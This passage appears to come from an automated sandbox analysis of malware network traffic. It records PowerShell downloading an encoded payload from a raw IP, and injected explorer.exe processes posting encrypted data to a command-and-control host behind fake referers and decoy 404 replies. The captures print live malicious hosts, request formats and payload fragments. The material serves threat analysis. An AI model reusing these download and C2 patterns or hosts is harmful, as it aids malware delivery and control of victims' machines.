                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Jan 9, 2025 08:02:00.250449896 CET1.1.1.1192.168.2.70xf47eNo error (0)res.cloudinary.comresc.cloudinary.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 9, 2025 08:02:44.432193995 CET1.1.1.1192.168.2.70x9a27No error (0)prolinice.ga46.173.214.14A (IP address)IN (0x0001)false

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • 192.3.27.144
                                                                                                                                                    • xeoxlfalojah.net
                                                                                                                                                      • prolinice.ga
                                                                                                                                                    • gsfmhaothvg.com
                                                                                                                                                    • yilwfgipaws.com

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.749763192.3.27.144805128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Jan 9, 2025 08:02:19.612373114 CET83OUTGET /250/evenmegoodfor.txt HTTP/1.1
                                                                                                                                                    Host: 192.3.27.144
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 9, 2025 08:02:20.096890926 CET1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 09 Jan 2025 07:02:20 GMT
                                                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                    Last-Modified: Tue, 07 Jan 2025 16:11:41 GMT
                                                                                                                                                    ETag: "c558-62b2000228871"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 50520
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                    Data Raw: 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                    Data Ascii: ==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.096911907 CET224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.096937895 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.097006083 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.097018957 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.097179890 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.097193956 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.097206116 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.097305059 CET776INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.097317934 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                    Jan 9, 2025 08:02:20.101871967 CET1236INData Raw: 73 6b 63 62 79 6a 54 57 6a 2f 31 32 5a 4e 6d 58 62 68 31 59 73 68 33 30 69 64 52 74 52 55 35 46 2b 69 54 49 56 30 39 6b 39 79 6c 78 5a 47 2f 6d 6c 77 59 48 74 63 57 43 62 31 53 4e 53 45 41 46 39 4b 5a 2f 47 38 74 45 6a 62 5a 5a 64 4d 62 6c 37 41
                                                                                                                                                    Data Ascii: skcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNxWVN+UbCRZ3D02qZ108LzPpQZbLUCHlMBOt2lynKxVufSLRGxuTWNFfK1YlKywbvtIRcKVbsCgU0j5aVAPpNkjnFRTQslVjD1GB7lS1Ig


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.74991346.173.214.14804056C:\Windows\explorer.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Jan 9, 2025 08:02:44.438400030 CET278OUTPOST /index.php HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://xeoxlfalojah.net/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Length: 310
                                                                                                                                                    Host: prolinice.ga
                                                                                                                                                    Jan 9, 2025 08:02:44.438425064 CET310OUTData Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 f6 87 a1 2b 21 81 22 0e 03 a1 68 6d e3 36 d6 88 68 45 d7 76 e0 a7 3a bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 42 d8 fa cc
                                                                                                                                                    Data Ascii: nIjcLQ%!GzeI67f+!"hm6hEv:RY;PLB3rh9n7 n\$yU^erE^}I&cKVT`uVv,/]O&,~e' A`QMknn0Xe]MPLH
                                                                                                                                                    Jan 9, 2025 08:02:45.418756008 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Thu, 09 Jan 2025 07:02:45 GMT
                                                                                                                                                    Server: Apache/2.4.59 (Debian)
                                                                                                                                                    Connection: close
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 35 32 64 35 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a [TRUNCATED]
                                                                                                                                                    Data Ascii: 52d53_'!yS5&M%DJ;Gw,%)g{RFzT~r~DkAcJnKBe(;Q`x:2Gx{EJy/ym!Q]K,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~Yr [TRUNCATED]
                                                                                                                                                    Jan 9, 2025 08:02:45.418781042 CET1236INData Raw: 50 60 c1 62 4e 47 09 99 34 01 6f 12 1a 46 5a dc 19 8a 32 8e 3a 4a 46 78 d9 bd c0 47 06 63 a2 e7 43 6c 5f a3 5c e6 3f 2b e2 a7 6d 88 36 d1 ab 7a 33 cd e9 51 55 b8 03 fb 2e 0d 79 6a 86 6c 78 60 5a 8e 07 2c 38 79 4f 36 32 6e 72 7e f0 72 29 40 6c 3b
                                                                                                                                                    Data Ascii: P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z,8yO62nr~r)@l;i2,!a'MyPXN_k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gtgcwmV`&$E^
                                                                                                                                                    Jan 9, 2025 08:02:45.418793917 CET1236INData Raw: 3a 8d 8e cb 46 35 1a 7d f4 ef 1b d7 93 ab 25 b8 e4 a0 82 b6 86 fd 09 d8 a2 56 03 b9 bb 52 d2 5a 38 70 92 0a 6f 3e 66 10 29 91 14 e3 c8 e6 94 a8 a4 07 12 25 68 3e 18 de c7 0a 45 28 0f 3d 2b 64 16 02 7e ff 0f a4 b4 58 7b 10 00 8c 05 3f 8c c3 7c 9e
                                                                                                                                                    Data Ascii: :F5}%VRZ8po>f)%h>E(=+d~X{?|Ki06aKs=l?D7D;z6UM"iI"dioztH*{XgQlF}7u\C7:,#4QBGg 6!D6w\)85
                                                                                                                                                    Jan 9, 2025 08:02:45.418910027 CET1236INData Raw: 84 a9 cc 3b 27 55 20 28 f5 e4 f0 78 5e 1c 8e b8 52 e9 61 ab 70 7a 85 27 8f 78 0d 7a ea be c2 6f cb e2 76 e4 97 a3 c9 96 89 91 ea 3a 3f 38 2c 65 17 f7 0f 58 91 00 4f 5c d5 5b d5 e7 e3 a4 79 62 2a d3 08 62 f3 d5 fa 87 d5 e0 9e f7 7d 8b df 15 4a 12
                                                                                                                                                    Data Ascii: ;'U (x^Rapz'xzov:?8,eXO\[yb*b}Jp>0+;*8-hg=hYQIHI,%07?b{Kk'BS\kV#vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dg
                                                                                                                                                    Jan 9, 2025 08:02:45.418925047 CET1236INData Raw: 92 ea 93 ce c8 3e fc 5a 3e 39 d3 ea ef e1 a4 b4 b6 2d 36 1e 6a da 77 63 fa f0 9c d7 df ca db b4 76 11 2d 5d 69 c2 4d 81 7c 26 e0 2d 27 6c d3 89 5a 1d 68 79 e5 c1 7e 0e b4 d7 d3 68 a6 3b fe 86 fa da 27 b9 07 35 a4 83 b4 3d f1 e3 59 a4 0e 98 a2 4c
                                                                                                                                                    Data Ascii: >Z>9-6jwcv-]iM|&-'lZhy~h;'5=YLiy24^!pB-EN9skxX|n},kx\u*1"p}I>-SfjOYfO?d$UW=#KTZBhV1X)jGD_C
                                                                                                                                                    Jan 9, 2025 08:02:45.418936968 CET1120INData Raw: a4 ac b4 43 c2 a6 fd 64 18 c3 67 49 9b c3 fd 66 e0 83 93 db 2f d1 a5 05 8c 81 1e 21 49 68 1f 6e 94 20 ef 17 fc 14 0f 5a 69 db 40 a6 58 74 e1 44 c4 09 1b af 2a ba fb 88 c0 a4 d0 5e 14 ee 23 0d 4e c0 c8 89 6f 2c 87 34 0b 30 3b dc 3b 0d 3e fe 69 8d
                                                                                                                                                    Data Ascii: CdgIf/!Ihn Zi@XtD*^#No,40;;>i[tH6VCwTEk:0&JtICdsW2RU"`-u[WfHMG>GW=]%5AjZA][az,:S/q+
                                                                                                                                                    Jan 9, 2025 08:02:45.418989897 CET1236INData Raw: 10 7a 7f 88 38 1a ab bb 21 b9 69 ca 04 6b ff b9 a2 96 71 4a eb 5b 56 13 2c 9e 54 5b 3f 3e 4a 0c d7 79 3b 83 74 21 4f 0a a0 14 6a e2 95 a1 99 f8 12 7d b0 e3 d3 ba 48 78 e2 e8 71 e9 9c e6 a3 dc 91 cb d4 a3 f1 0d 3a c6 3f b3 f3 d9 97 91 49 d3 be 04
                                                                                                                                                    Data Ascii: z8!ikqJ[V,T[?>Jy;t!Oj}Hxq:?Ig(TW--^rL-m\HTXd.elx 9b71SmX~io"r~L&\@[KgeK4Zb4rdi 8?}jO;
                                                                                                                                                    Jan 9, 2025 08:02:45.418999910 CET224INData Raw: 1d 90 c9 11 a9 a7 7d f7 ab 8c 62 8d c9 7e 36 f4 e0 89 2f 9e df 1f 76 3e 3b ef 65 26 1a ba 08 48 9b fb ba 78 e4 ac 74 0f dc fb aa 1d 89 45 99 38 5e 4c 93 a3 ec 34 c1 0a 2c cb dc 87 b2 14 06 72 07 32 c1 1b 09 c1 94 54 35 6e 39 6e 0d eb 44 30 ce f3
                                                                                                                                                    Data Ascii: }b~6/v>;e&HxtE8^L4,r2T5n9nD0Sk1%o[;Wch\Zty"n*_vUL*WvNzY&k:_@qfh)[\LMj8Lcyy:_w|O|:83GU.R=
                                                                                                                                                    Jan 9, 2025 08:02:45.419035912 CET1236INData Raw: 90 7d 0f 3a 11 da 07 18 69 c9 f9 71 a7 39 b5 5b 4e dc c5 8a f3 54 7d 5d 3b d2 b1 96 9f 58 75 18 61 b0 ca 9b 8b d8 1a 4a 36 03 5b b6 f6 3f f8 f6 27 e8 8b 5a 1c d0 47 a3 50 e6 c4 e8 49 ed 16 93 c6 4f 1e 1e 70 6f 39 17 f5 bb bc 1c bc dd f6 6f 51 97
                                                                                                                                                    Data Ascii: }:iq9[NT}];XuaJ6[?'ZGPIOpo9oQDoOVFhuu<gB#qx)z#j-d$hUe4U4GX (7@2$.D^Deti{j\p%M;*^ kn?'Cx
                                                                                                                                                    Jan 9, 2025 08:02:45.419116020 CET1236INData Raw: e0 b5 95 e4 56 a6 4d 3e cd fa 83 56 80 76 88 da b8 39 04 2c 0c 2a 4a 2f 88 b2 83 c9 f1 f3 ca 27 e3 38 5c 99 e3 30 ab 16 18 02 e1 f2 ab 23 ec f0 2f 0e 40 c4 35 0c 56 44 9f 51 df d3 68 66 65 a4 5a 71 ec 54 e2 2c 25 1d b8 fe ff 39 c7 6c cd 89 b1 1f
                                                                                                                                                    Data Ascii: VM>Vv9,*J/'8\0#/@5VDQhfeZqT,%9lXFY![bKor_pkX"}Wmg^IZlJ|.)(FW9{U,O1NmO~`?m5[UdXlc,7^UEr<l]_4-


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.74994246.173.214.14802060C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Jan 9, 2025 08:02:49.840712070 CET274OUTPOST /index.php HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://prolinice.ga/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Length: 501
                                                                                                                                                    Host: prolinice.ga
                                                                                                                                                    Jan 9, 2025 08:02:49.840727091 CET501OUTData Raw: 6e e2 90 f9 c0 49 85 11 6a 63 b4 11 4c 51 88 8e af 25 ed 21 47 fd bd 98 f5 ec 7a 65 d6 49 36 01 37 b1 eb c4 0f d1 82 d7 66 bb c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 65 a4 f0 a2
                                                                                                                                                    Data Ascii: nIjcLQ%!GzeI67feug]H8.6hEvRY;PLeOc~k_!z1rJC\S7W/x*>x :xGresn*q~jAkuE)\1>mnW61%_Q.,})!s~VD5HO!
                                                                                                                                                    Jan 9, 2025 08:02:50.795160055 CET584INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Thu, 09 Jan 2025 07:02:50 GMT
                                                                                                                                                    Server: Apache/2.4.59 (Debian)
                                                                                                                                                    Content-Length: 409
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.74998746.173.214.14804056C:\Windows\explorer.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Jan 9, 2025 08:04:01.550930977 CET277OUTPOST /index.php HTTP/1.1
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: */*
                                                                                                                                                    Referer: http://gsfmhaothvg.com/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    Content-Length: 109
                                                                                                                                                    Host: prolinice.ga
